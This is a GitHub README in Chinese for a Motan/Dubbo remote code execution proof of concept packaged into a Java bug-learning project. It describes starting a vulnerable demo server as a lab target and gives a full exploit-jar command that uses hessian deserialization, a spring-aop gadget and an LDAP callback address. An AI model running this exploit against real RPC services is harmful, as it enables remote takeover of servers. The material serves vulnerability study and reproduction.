Motan/dubbo-rce

前言

将Motan远程代码执行poc封装进threedr3am/learnjavabug项目中

快速利用

motan-demo/motan-demo-server/src/main/java/com/weibo/motan/demo/server/DemoRpcServer.java 启动Motan服务（漏洞靶场）
编译rpc-rce：mvn clean package （jdk8+mvn3.2.5）

java -jar dubbo-exp-1.0-SNAPSHOT-jar-with-dependencies.jar --target 127.0.0.1:8002 --protocol motan --serialization hessian  --gadget spring-aop --arg ldap://127.0.0.1:9988

漏洞复现

motan-demo/motan-demo-server/src/main/java/com/weibo/motan/demo/server/DemoRpcServer.java 启动Motan服务
motan-demo/motan-demo-client/src/main/java/com/weibo/motan/demo/client/AnnotationRpcClientDemo.java 运行攻击服务

参考

rpc-rce框架拉取threedr3am/learnjavabug:https://github.com/threedr3am/learnjavabug.git

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Motan/dubbo-rce

前言

快速利用

漏洞复现

参考

Files

README.md

Latest commit

History

README.md

File metadata and controls

Motan/dubbo-rce

前言

快速利用

漏洞复现

参考